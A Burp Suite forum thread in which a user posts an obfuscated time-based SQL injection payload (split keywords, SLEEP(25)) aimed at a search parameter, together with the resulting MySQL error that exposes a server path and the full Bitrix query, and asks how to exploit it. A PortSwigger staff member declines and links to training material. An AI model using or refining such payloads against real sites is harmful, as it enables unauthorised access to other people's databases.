Burp Suite User Forum

Login to post

problem with sqli

Raul | Last updated: Jun 30, 2020 07:25AM UTC

I have been trying to exploit a sqli, because I do not have much knowledge on the subject, I wanted to ask for some opinion on how I could execute a successful sql query i have page vulnerable ?q=hola))))))/**_**/RLIK/**/E/**_**/(S/**/E/**/L/**/ECT/**_**/7294/**_**/F/**/R/**/OM/**_**/(S/**/E/**/L/**/ECT(SLEEP(25)))dFvD)/**_**/A/**/ND/**_**/((((((9022=9022 ERROR SQL File: /home/u/ucssoft/UCSNEW/public_html/bitrix/modules/search/classes/general/search.php<br>Line: 257<br><font color=#ff0000>MySQL Query Error: SELECT sc.ID ,sc.MODULE_ID ,sc.ITEM_ID ,sc.TITLE ,sc.TAGS ,sc.PARAM1 ,sc.PARAM2 ,sc.UPD ,sc.DATE_FROM ,sc.DATE_TO ,sc.URL ,sc.CUSTOM_RANK ,DATE_FORMAT(sc.DATE_CHANGE, '%d.%m.%Y %H:%i:%s') as FULL_DATE_CHANGE ,DATE_FORMAT(sc.DATE_CHANGE, '%d.%m.%Y') as DATE_CHANGE ,sc.USER_ID ,scsite.URL as SITE_URL ,scsite.SITE_ID ,stt.RANK as `RANK` FROM b_search_content sc INNER JOIN b_search_content_site scsite ON sc.ID=scsite.SEARCH_CONTENT_ID INNER JOIN ( select search_content_id, max(st.TF) TF, if(STDDEV(st.PS)-2.872281323269 between -0.000001 and 1, 1/STDDEV(st.PS), 0) + sum(st.TF/sf.FREQ) as `RANK` from b_search_content_stem st, b_search_content_freq sf where st.language_id = 'ru' and st.stem = sf.stem and sf.language_id = st.language_id and st.stem in (0, 0, 0, 0, 0, 0, 0, 1477, 0, 0) and sf.SITE_ID = 's1' group by st.search_content_id having (( (sum(st.stem = 0)&gt;0) )))))) AND (sum(st.stem = 0)&gt;0) AND ( (sum(st.stem = 0)&gt;0) AND (sum(st.stem = 0)&gt;0) AND (sum(st.stem = 0)&gt;0) AND ( (sum(st.stem = 0)&gt;0) AND ( (sum(st.stem = 0)&gt;0) AND ( (sum(st.stem = 1477)&gt;0) ))) AND (sum(st.stem = 0)&gt;0) ) AND (sum(st.stem = 0)&gt;0) AND (((((( 1=1 AND 1=1 )) ) stt ON sc.id = stt.search_content_id WHERE (( EXISTS ( SELECT 1 FROM b_search_content_right scg WHERE sc.ID = scg.SEARCH_CONTENT_ID AND scg.GROUP_CODE = 'G2' ))) AND ( ( scsite.SITE_ID = 's1') ) ORDER BY CUSTOM_RANK DESC, `RANK` DESC, sc.DATE_CHANGE DESC LIMIT 500</font>[[1248] Every derived table must have its own alias] I have tried with some burp intruder fuzzer but I have not got any correct query, or if you could confirm that it is not a sqli but a simple sqli query error that cannot be exploited

Hannah, PortSwigger Agent | Last updated: Jun 30, 2020 08:20AM UTC

Hi Raul. Unfortunately, I cannot interpret your results for you. As this is a public post, a member of the community may be able to help you better. Have you had a look at our Web Security Academy, to learn more about SQL injection? - https://portswigger.net/web-security/sql-injection

You need to Log in to post a reply. Or register here, for free.